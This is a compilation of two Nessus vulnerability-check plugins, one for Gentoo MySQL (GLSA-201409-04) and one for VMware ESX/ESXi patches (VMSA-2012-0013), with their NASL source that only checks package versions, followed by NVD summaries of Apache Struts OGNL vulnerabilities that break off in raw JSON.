Description (from the plugin): The remote Gentoo host is missing one or more security-related patches. The remote host is affected by the vulnerability described in GLSA-201409-04 (MySQL: Multiple vulnerabilities). Multiple vulnerabilities have been discovered in MySQL; please review the CVE identifiers referenced above for details. Impact: a local attacker could possibly gain escalated privileges. A remote attacker could send a specially crafted SQL query, possibly resulting in a Denial of Service condition. A remote attacker could entice a user to connect to a specially crafted MySQL server, possibly resulting in execution of arbitrary code with the privileges of the process. Workaround: there is no known workaround at this time. Solution: all MySQL users should upgrade to the latest version (`# emerge --sync`, then `# emerge --ask --oneshot --verbose '>=dev-db/mysql-5.5.39'`). See also [security.gentoo.org/glsa/201409-04](<https://security.gentoo.org/glsa/201409-04>).

Plugin source (the package check gates on dev-db/mysql being at least 5.5.39):

```nasl
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Gentoo Linux Security Advisory GLSA 201409-04.
#
# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.
# and licensed under the Creative Commons - Attribution / Share Alike
# license. See http://creativecommons.org/licenses/by-sa/3.0/
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(77548);
  script_version("1.8");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2013-1861", "CVE-2013-2134", "CVE-2013-3839", "CVE-2013-5767", "CVE-2013-5770", "CVE-2013-5786", "CVE-2013-5793", "CVE-2013-5807", "CVE-2013-5860", "CVE-2013-5881", "CVE-2013-5882", "CVE-2013-5891", "CVE-2013-5894", "CVE-2013-5908", "CVE-2014-0001", "CVE-2014-0384", "CVE-2014-0386", "CVE-2014-0393", "CVE-2014-0401", "CVE-2014-0402", "CVE-2014-0412", "CVE-2014-0420", "CVE-2014-0427", "CVE-2014-0430", "CVE-2014-0431", "CVE-2014-0433", "CVE-2014-0437", "CVE-2014-2419", "CVE-2014-2430", "CVE-2014-2431", "CVE-2014-2432", "CVE-2014-2434", "CVE-2014-2435", "CVE-2014-2436", "CVE-2014-2438", "CVE-2014-2440");
  script_bugtraq_id(58511, 60346, 63105, 63107, 63109, 63113, 63116, 63119, 64849, 64854, 64864, 64868, 64873, 64877, 64880, 64885, 64888, 64891, 64893, 64895, 64896, 64897, 64898, 64904, 64908, 65298, 66835, 66846, 66850, 66853, 66858, 66872, 66875, 66880, 66890, 66896);
  script_xref(name:"GLSA", value:"201409-04");

  script_name(english:"GLSA-201409-04 : MySQL: Multiple vulnerabilities");
  script_summary(english:"Checks for updated package(s) in /var/db/pkg");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote Gentoo host is missing one or more security-related
patches."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The remote host is affected by the vulnerability described in GLSA-201409-04
(MySQL: Multiple vulnerabilities)

    Multiple vulnerabilities have been discovered in MySQL. Please review
      the CVE identifiers referenced below for details.

Impact :

    A local attacker could possibly gain escalated privileges. A remote
      attacker could send a specially crafted SQL query, possibly resulting in
      a Denial of Service condition. A remote attacker could entice a user to
      connect to specially crafted MySQL server, possibly resulting in
      execution of arbitrary code with the privileges of the process.

Workaround :

    There is no known workaround at this time."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://security.gentoo.org/glsa/201409-04"
  );
  script_set_attribute(
    attribute:"solution",
    value:
"All MySQL users should upgrade to the latest version:
    # emerge --sync
    # emerge --ask --oneshot --verbose '>=dev-db/mysql-5.5.39'"
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:mysql");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux");

  script_set_attribute(attribute:"patch_publication_date", value:"2014/09/04");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/09/05");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.");
  script_family(english:"Gentoo Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list");

  exit(0);
}


include("audit.inc");
include("global_settings.inc");
include("qpkg.inc");

if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo");
if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING);


flag = 0;

# The actual check: any installed dev-db/mysql below 5.5.39 is reported.
if (qpkg_check(package:"dev-db/mysql", unaffected:make_list("ge 5.5.39"), vulnerable:make_list("lt 5.5.39"))) flag++;

if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());
  else security_hole(0);
  exit(0);
}
else
{
  tested = qpkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "MySQL");
}
```

VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries. Nessus scanner plugin 61747 ([tenable.com/plugins/nessus/61747](<https://www.tenable.com/plugins/nessus/61747>)), published 2012-08-31, last modified 2021-01-06. CPE: cpe:/o:vmware:esx:4.0, cpe:/o:vmware:esx:4.1, cpe:/o:vmware:esxi:4.1, cpe:/o:vmware:esxi:5.0. CVSS v3.0 9.1 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H); CVSS v2 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). The Struts-relevant item is k, the Apache Struts component in vCenter Operations (CVE-2012-0393).

CVEs: CVE-2009-5029, CVE-2009-5064, CVE-2010-0830, CVE-2010-2761, CVE-2010-4180, CVE-2010-4252, CVE-2010-4410, CVE-2011-0014, CVE-2011-1020, CVE-2011-1089, CVE-2011-1833, CVE-2011-2484, CVE-2011-2496, CVE-2011-2699, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363, CVE-2011-3597, CVE-2011-4108, CVE-2011-4109, CVE-2011-4110, CVE-2011-4128, CVE-2011-4132, CVE-2011-4324, CVE-2011-4325, CVE-2011-4576, CVE-2011-4577, CVE-2011-4609, CVE-2011-4619, CVE-2011-5057, CVE-2012-0050, CVE-2012-0060, CVE-2012-0061, CVE-2012-0207, CVE-2012-0391, CVE-2012-0392, CVE-2012-0393, CVE-2012-0394, CVE-2012-0815, CVE-2012-0841, CVE-2012-0864, CVE-2012-1569, CVE-2012-1573, CVE-2012-1583, CVE-2012-2110.

Description (from the plugin): The remote VMware ESXi / ESX host is missing one or more security-related patches.

a. vCenter and ESX update to JRE 1.6.0 Update 31. The Oracle (Sun) JRE is updated to version 1.6.0_31, which addresses multiple security issues. Oracle has documented the CVE identifiers that are addressed by this update in the Oracle Java SE Critical Patch Update Advisory of February 2012.

b. vCenter Update Manager update to JRE 1.5.0 Update 36. The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple security issues. Oracle has documented the CVE identifiers that are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical Patch Update Advisory for June 2012.

c. Update to ESX/ESXi userworld OpenSSL library. The ESX/ESXi userworld OpenSSL library is updated from version 0.9.8p to version 0.9.8t to resolve multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-4180, CVE-2010-4252, CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576, CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.

d. Update to ESX service console OpenSSL RPM. The service console OpenSSL RPM is updated to version 0.9.8e-22.el5_8.3 to resolve a security issue. CVE has assigned the name CVE-2012-2110 to this issue.

e. Update to ESX service console kernel. The ESX service console kernel is updated to resolve multiple security issues. CVE has assigned the names CVE-2011-1833, CVE-2011-2484, CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363, CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324, CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583 to these issues.

f. Update to ESX service console Perl RPM. The ESX service console Perl RPM is updated to perl-5.8.8.32.1.8999.vmw to resolve multiple security issues. CVE has assigned the names CVE-2010-2761, CVE-2010-4410, and CVE-2011-3597 to these issues.

g. Update to ESX service console libxml2 RPMs. The ESX service console libxml2 RPMs are updated to libxml2-2.6.26-2.1.15.el5_8.2 and libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security issue. CVE has assigned the name CVE-2012-0841 to this issue.

h. Update to ESX service console glibc RPM. The ESX service console glibc RPM is updated to version glibc-2.5-81.el5_8.1 to resolve multiple security issues. CVE has assigned the names CVE-2009-5029, CVE-2009-5064, CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864 to these issues.

i. Update to ESX service console GnuTLS RPM. The ESX service console GnuTLS RPM is updated to version 1.4.1-7.el5_8.2 to resolve multiple security issues. CVE has assigned the names CVE-2011-4128, CVE-2012-1569, and CVE-2012-1573 to these issues.

j. Update to ESX service console popt, rpm, rpm-libs, and rpm-python RPMs. These are updated to popt-1.10.2.3-28.el5_8, rpm-4.4.2.3-28.el5_8, rpm-libs-4.4.2.3-28.el5_8 and rpm-python-4.4.2.3-28.el5_8 to resolve multiple security issues. CVE has assigned the names CVE-2012-0060, CVE-2012-0061, and CVE-2012-0815 to these issues.

k. Vulnerability in third-party Apache Struts component. The version of Apache Struts in vCenter Operations has been updated to 2.3.4, which addresses an arbitrary file overwrite vulnerability. This vulnerability allows an attacker to create a denial of service by overwriting arbitrary files without authentication. The attacker would need to be on the same network as the system where vCOps is installed. CVE has assigned the name CVE-2012-0393 to this issue. Note: Apache Struts 2.3.4 addresses CVE-2011-5057, CVE-2012-0391, CVE-2012-0392 and CVE-2012-0394 as well; it was found that these do not affect vCOps. VMware would like to thank Alexander Minozhenko from ERPScan for reporting this issue.

Solution: apply the missing patches. See also [lists.vmware.com/pipermail/security-announce/2012/000197.html](<http://lists.vmware.com/pipermail/security-announce/2012/000197.html>).

Plugin source (the check looks for the ESX 4.0, ESX 4.1 and ESXi 4.1 patch bundles, or the ESXi 5.0 esx-base VIB 5.0.0-1.25.912577):

```nasl
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from VMware Security Advisory 2012-0013.
# The text itself is copyright (C) VMware Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(61747);
  script_version("1.57");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");

  script_cve_id("CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2010-2761", "CVE-2010-4180", "CVE-2010-4252", "CVE-2010-4410", "CVE-2011-0014", "CVE-2011-1020", "CVE-2011-1089", "CVE-2011-1833", "CVE-2011-2484", "CVE-2011-2496", "CVE-2011-2699", "CVE-2011-3188", "CVE-2011-3209", "CVE-2011-3363", "CVE-2011-3597", "CVE-2011-4108", "CVE-2011-4109", "CVE-2011-4110", "CVE-2011-4128", "CVE-2011-4132", "CVE-2011-4324", "CVE-2011-4325", "CVE-2011-4576", "CVE-2011-4577", "CVE-2011-4609", "CVE-2011-4619", "CVE-2012-0050", "CVE-2012-0060", "CVE-2012-0061", "CVE-2012-0207", "CVE-2012-0393", "CVE-2012-0815", "CVE-2012-0841", "CVE-2012-0864", "CVE-2012-1569", "CVE-2012-1573", "CVE-2012-1583", "CVE-2012-2110");
  script_bugtraq_id(40063, 44199, 45145, 45163, 45164, 46264, 46567, 46740, 47321, 48383, 48802, 49108, 49289, 49626, 49911, 50311, 50609, 50663, 50755, 50798, 50898, 51194, 51257, 51281, 51343, 51366, 51439, 51467, 51563, 52009, 52010, 52011, 52012, 52013, 52014, 52015, 52016, 52017, 52018, 52019, 52020, 52107, 52161, 52201, 52667, 52668, 52865, 53136, 53139, 53158, 53946, 53947, 53948, 53949, 53950, 53951, 53952, 53953, 53954, 53956, 53958, 53959, 53960);
  script_xref(name:"VMSA", value:"2012-0013");

  script_name(english:"VMSA-2012-0013 : VMware vSphere and vCOps updates to third-party libraries");
  script_summary(english:"Checks esxupdate output for the patches");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote VMware ESXi / ESX host is missing one or more
security-related patches."
  );
  script_set_attribute(
    attribute:"description",
    value:
"a. vCenter and ESX update to JRE 1.6.0 Update 31

   The Oracle (Sun) JRE is updated to version 1.6.0_31, which
   addresses multiple security issues. Oracle has documented the
   CVE identifiers that are addressed by this update in the Oracle
   Java SE Critical Patch Update Advisory of February 2012.

b. vCenter Update Manager update to JRE 1.5.0 Update 36

   The Oracle (Sun) JRE is updated to 1.5.0_36 to address multiple
   security issues. Oracle has documented the CVE identifiers that
   are addressed in JRE 1.5.0_36 in the Oracle Java SE Critical
   Patch Update Advisory for June 2012.

c. Update to ESX/ESXi userworld OpenSSL library

   The ESX/ESXi userworld OpenSSL library is updated from version
   0.9.8p to version 0.9.8t to resolve multiple security issues.

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the names CVE-2010-4180, CVE-2010-4252,
   CVE-2011-0014, CVE-2011-4108, CVE-2011-4109, CVE-2011-4576,
   CVE-2011-4577, CVE-2011-4619, and CVE-2012-0050 to these issues.

d. Update to ESX service console OpenSSL RPM

   The service console OpenSSL RPM is updated to version
   0.9.8e-22.el5_8.3 to resolve a security issue.

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the name CVE-2012-2110 to this issue.

e. Update to ESX service console kernel

   The ESX service console kernel is updated to resolve multiple
   security issues.

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the names CVE-2011-1833, CVE-2011-2484,
   CVE-2011-2496, CVE-2011-3188, CVE-2011-3209, CVE-2011-3363,
   CVE-2011-4110, CVE-2011-1020, CVE-2011-4132, CVE-2011-4324,
   CVE-2011-4325, CVE-2012-0207, CVE-2011-2699, and CVE-2012-1583
   to these issues.

f. Update to ESX service console Perl RPM

   The ESX service console Perl RPM is updated to
   perl-5.8.8.32.1.8999.vmw to resolve multiple security issues.

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the names CVE-2010-2761, CVE-2010-4410, and
   CVE-2011-3597 to these issues.

g. Update to ESX service console libxml2 RPMs

   The ESX service console libmxl2 RPMs are updated to
   libxml2-2.6.26-2.1.15.el5_8.2 and
   libxml2-python-2.6.26-2.1.15.el5_8.2 to resolve a security
   issue.

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the name CVE-2012-0841 to this issue.

h. Update to ESX service console glibc RPM

   The ESX service console glibc RPM is updated to version
   glibc-2.5-81.el5_8.1 to resolve multiple security issues.

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the names CVE-2009-5029, CVE-2009-5064,
   CVE-2010-0830, CVE-2011-1089, CVE-2011-4609, and CVE-2012-0864
   to these issue.

i. Update to ESX service console GnuTLS RPM

   The ESX service console GnuTLS RPM is updated to version
   1.4.1-7.el5_8.2 to resolve multiple security issues.

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the names CVE-2011-4128, CVE-2012-1569, and
   CVE-2012-1573 to these issues.

j. Update to ESX service console popt, rpm, rpm-libs,
   and rpm-python RPMS

   The ESX service console popt, rpm, rpm-libs, and rpm-python RPMS
   are updated to the following versions to resolve multiple
   security issues :
   - popt-1.10.2.3-28.el5_8
   - rpm-4.4.2.3-28.el5_8
   - rpm-libs-4.4.2.3-28.el5_8
   - rpm-python-4.4.2.3-28.el5_8

   The Common Vulnerabilities and Exposures project (cve.mitre.org)
   has assigned the name CVE-2012-0060, CVE-2012-0061, and
   CVE-2012-0815 to these issues.

k. Vulnerability in third-party Apache Struts component

   The version of Apache Struts in vCenter Operations has been
   updated to 2.3.4 which addresses an arbitrary file overwrite
   vulnerability. This vulnerability allows an attacker to create
   a denial of service by overwriting arbitrary files without
   authentication. The attacker would need to be on the same network
   as the system where vCOps is installed.

   The Common Vulnerabilities and Exposures project (cve.mitre.org) has
   assigned the name CVE-2012-0393 to this issue.

   Note: Apache struts 2.3.4 addresses the following issues as well :
   CVE-2011-5057, CVE-2012-0391, CVE-2012-0392, CVE-2012-0394. It
   was found that these do not affect vCOps.

   VMware would like to thank Alexander Minozhenko from ERPScan for
   reporting this issue to us."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://lists.vmware.com/pipermail/security-announce/2012/000197.html"
  );
  script_set_attribute(attribute:"solution", value:"Apply the missing patches.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Java Applet Field Bytecode Verifier Cache Remote Code Execution');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:esx:4.0");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:esx:4.1");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:esxi:4.1");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:vmware:esxi:5.0");

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/06/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/08/30");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/08/31");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"VMware ESX Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/VMware/release", "Host/VMware/version");
  script_require_ports("Host/VMware/esxupdate", "Host/VMware/esxcli_software_vibs");

  exit(0);
}


include("audit.inc");
include("vmware_esx_packages.inc");


if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/VMware/release")) audit(AUDIT_OS_NOT, "VMware ESX / ESXi");
if (
  !get_kb_item("Host/VMware/esxcli_software_vibs") &&
  !get_kb_item("Host/VMware/esxupdate")
) audit(AUDIT_PACKAGE_LIST_MISSING);


init_esx_check(date:"2012-08-30");
flag = 0;


# ESX 4.0: the three VMSA-2012-0013 bundles, or any later bundle that supersedes them.
if (
  esx_check(
    ver           : "ESX 4.0",
    patch         : "ESX400-201209401-SG",
    patch_updates : make_list("ESX400-201302401-SG", "ESX400-201305401-SG", "ESX400-201310401-SG", "ESX400-201404401-SG")
  )
) flag++;
if (
  esx_check(
    ver           : "ESX 4.0",
    patch         : "ESX400-201209402-SG",
    patch_updates : make_list("ESX400-201305404-SG", "ESX400-201310402-SG")
  )
) flag++;
if (esx_check(ver:"ESX 4.0", patch:"ESX400-201209404-SG")) flag++;

# ESX 4.1: seven bundles, all superseded by Update 3.
if (
  esx_check(
    ver           : "ESX 4.1",
    patch         : "ESX410-201208101-SG",
    patch_updates : make_list("ESX410-201211401-SG", "ESX410-201301401-SG", "ESX410-201304401-SG", "ESX410-201307401-SG", "ESX410-201312401-SG", "ESX410-201404401-SG", "ESX410-Update03")
  )
) flag++;
if (
  esx_check(
    ver           : "ESX 4.1",
    patch         : "ESX410-201208102-SG",
    patch_updates : make_list("ESX410-201301405-SG", "ESX410-201304402-SG", "ESX410-201307405-SG", "ESX410-Update03")
  )
) flag++;
if (
  esx_check(
    ver           : "ESX 4.1",
    patch         : "ESX410-201208103-SG",
    patch_updates : make_list("ESX410-201307403-SG", "ESX410-Update03")
  )
) flag++;
if (
  esx_check(
    ver           : "ESX 4.1",
    patch         : "ESX410-201208104-SG",
    patch_updates : make_list("ESX410-Update03")
  )
) flag++;
if (
  esx_check(
    ver           : "ESX 4.1",
    patch         : "ESX410-201208105-SG",
    patch_updates : make_list("ESX410-Update03")
  )
) flag++;
if (
  esx_check(
    ver           : "ESX 4.1",
    patch         : "ESX410-201208106-SG",
    patch_updates : make_list("ESX410-201307404-SG", "ESX410-Update03")
  )
) flag++;
if (
  esx_check(
    ver           : "ESX 4.1",
    patch         : "ESX410-201208107-SG",
    patch_updates : make_list("ESX410-Update03")
  )
) flag++;

# ESXi 4.1: one bundle, superseded by Update 3.
if (
  esx_check(
    ver           : "ESXi 4.1",
    patch         : "ESXi410-201208101-SG",
    patch_updates : make_list("ESXi410-201211401-SG", "ESXi410-201301401-SG", "ESXi410-201304401-SG", "ESXi410-201307401-SG", "ESXi410-201312401-SG", "ESXi410-201404401-SG", "ESXi410-Update03")
  )
) flag++;

# ESXi 5.0: checked by VIB version rather than patch bundle.
if (esx_check(ver:"ESXi 5.0", vib:"VMware:esx-base:5.0.0-1.25.912577")) flag++;


if (flag)
{
  if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
```

#### Related CVEs (NVD)

- [CVE-2013-2134](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2134>): Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted action name that is not properly handled during wildcard matching, a different vulnerability than CVE-2013-2135. CWE-94. Published 2013-07-16, modified 2018-11-23. CVSS v2 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C; exploitability 8.6, impact 10.0). No affected-product CPEs listed.
- [CVE-2010-1870](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1870>): The OGNL extensive expression evaluation capability in XWork in Struts 2.0.0 through 2.1.8.1, as used in Atlassian Fisheye, Crucible, and possibly other products, uses a permissive whitelist, which allows remote attackers to modify server-side context objects and bypass the "#" protection mechanism in ParameterInterceptors via the (1) #context, (2) #_memberAccess, (3) #root, (4) #this, (5) #_typeResolver, (6) #_classResolver, (7) #_traceEvaluations, (8) #_lastEvaluation, (9) #_keepLastEvaluation, and possibly other OGNL context variables, a different vulnerability than CVE-2008-6504. CWE: NVD-CWE-Other. Published 2010-08-17, modified 2020-10-20. CVSS v2 5.0 MEDIUM (AV:N/AC:L/Au:N/C:N/I:P/A:N; exploitability 10.0, impact 2.9). Affected (NVD CPEs): Apache Struts 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.11.1, 2.0.11.2, 2.0.12, 2.0.13, 2.0.14, 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6, 2.1.8, 2.1.8.1.
- [CVE-2013-2115](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2115>): Apache Struts 2 before 2.3.14.2 allows remote attackers to execute arbitrary OGNL code via a crafted request that is not properly handled when using the includeParams attribute in the (1) URL or (2) A tag. NOTE: this issue is due to an incomplete fix for CVE-2013-1966. CWE-94. Published 2013-07-10, modified 2020-09-24. CVSS v3.1 8.1 HIGH (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H; exploitability 2.2, impact 5.9); CVSS v2 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C; exploitability 8.6, impact 10.0). Affected (NVD CPE): Apache Struts 2.3.14.1.
- [CVE-2016-3093](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3093>): Apache Struts 2.0.0 through 2.3.24.1 does not properly cache method references when used with OGNL before 3.0.12, which allows remote attackers to cause a denial of service (block access to a web site) via unspecified vectors. CWE-20. Published 2016-06-07, modified 2016-11-28. CVSS v3.0 5.3 MEDIUM (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L; exploitability 3.9, impact 1.4); CVSS v2 5.0 MEDIUM (AV:N/AC:L/Au:N/C:N/I:N/A:P; exploitability 10.0, impact 2.9). Affected (NVD CPEs): OGNL 3.0.11; Apache Struts 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.11.1, 2.0.11.2, 2.0.12, 2.0.13, 2.0.14, 2.1.0, 2.1.1, 2.1.2, 2.1.3, 2.1.4, 2.1.5, 2.1.6, 2.1.8, 2.1.8.1, 2.2.1, 2.2.1.1, 2.2.3, 2.2.3.1, 2.3.1, 2.3.1.1, 2.3.1.2, 2.3.4, 2.3.4.1, 2.3.7, 2.3.8, 2.3.12, 2.3.14, 2.3.14.1, 2.3.14.2, 2.3.14.3, 2.3.15, 2.3.15.1, 2.3.15.2, 2.3.15.3, 2.3.16, 2.3.16.1, 2.3.16.2, 2.3.16.3, 2.3.20, 2.3.20.1, 2.3.20.3, 2.3.24, 2.3.24.1.
- [CVE-2008-6504](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6504>): ParametersInterceptor in OpenSymphony XWork 2.0.x before 2.0.6 and 2.1.x before 2.1.2, as used in Apache Struts and other products, does not properly restrict # (pound sign) references to context objects, which allows remote attackers to execute Object-Graph Navigation Language (OGNL) statements and modify server-side context objects, as demonstrated by use of a \u0023 representation for the # character. CWE-20. Published 2009-03-23, modified 2017-08-17. CVSS v2 5.0 MEDIUM (AV:N/AC:L/Au:N/C:N/I:P/A:N; exploitability 10.0, impact 2.9). Affected (NVD CPEs): OpenSymphony XWork 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.1.0, 2.1.1; Apache Struts 2.0.0, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.11, 2.0.11.1, 2.0.11.2.
- [CVE-2013-2135](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2135>): Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arbitrary OGNL code via a request with a crafted value that contains both "${}" and "%{}" sequences, which causes the OGNL code to be evaluated twice. CWE-94. Published 2013-07-16, modified 2018-11-23. CVSS v2 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C; exploitability 8.6, impact 10.0). No affected-product CPEs listed.
- [CVE-2013-2251](<https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2251>): Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute arbitrary OGNL expressions via a parameter with a crafted (1) action:, (2) redirect:, or (3) redirectAction: prefix. CWE-20. Published 2013-07-20, modified 2020-10-20. CVSS v2 9.3 HIGH (AV:N/AC:M/Au:N/C:C/I:C/A:C; exploitability 8.6, impact 10.0). Affected (NVD CPEs, in the order given; the source's list is cut off after the last entry): Apache Struts 2.3.1.2, 2.3.14.1, 2.3.14, 2.1.5, 2.2.1.1, 2.1.6, 2.3.3, 2.3.7, 2.0.10, 2.3.4, 2.1.2, 2.3.8, 2.3.14.3, 2.0.0, 2.0.12, 2.0.11.2, 2.0.6, 2.0.11.1, 2.3.14.2
"cpe:/a:apache:struts:2.0.13", "cpe:/a:apache:struts:2.0.5", "cpe:/a:apache:struts:2.0.9", "cpe:/a:apache:struts:2.0.14", "cpe:/a:apache:struts:2.0.11", "cpe:/a:apache:struts:2.1.8.1", "cpe:/a:apache:struts:2.1.1", "cpe:/a:apache:struts:2.1.0", "cpe:/a:apache:struts:2.0.3", "cpe:/a:apache:struts:2.0.4", "cpe:/a:apache:struts:2.0.2", "cpe:/a:apache:struts:2.2.3.1", "cpe:/a:apache:struts:2.3.12", "cpe:/a:apache:struts:2.2.1", "cpe:/a:apache:struts:2.1.3", "cpe:/a:apache:struts:2.2.3", "cpe:/a:apache:struts:2.0.1", "cpe:/a:apache:struts:2.0.8", "cpe:/a:apache:struts:2.1.8", "cpe:/a:apache:struts:2.3.4.1", "cpe:/a:apache:struts:2.3.1", "cpe:/a:apache:struts:2.3.1.1", "cpe:/a:apache:struts:2.3.15", "cpe:/a:apache:struts:2.0.7", "cpe:/a:apache:struts:2.1.4"], "id": "CVE-2013-2251", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2251", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.1:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.14.2:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.0.4:*:*:*:*:*:*:*", 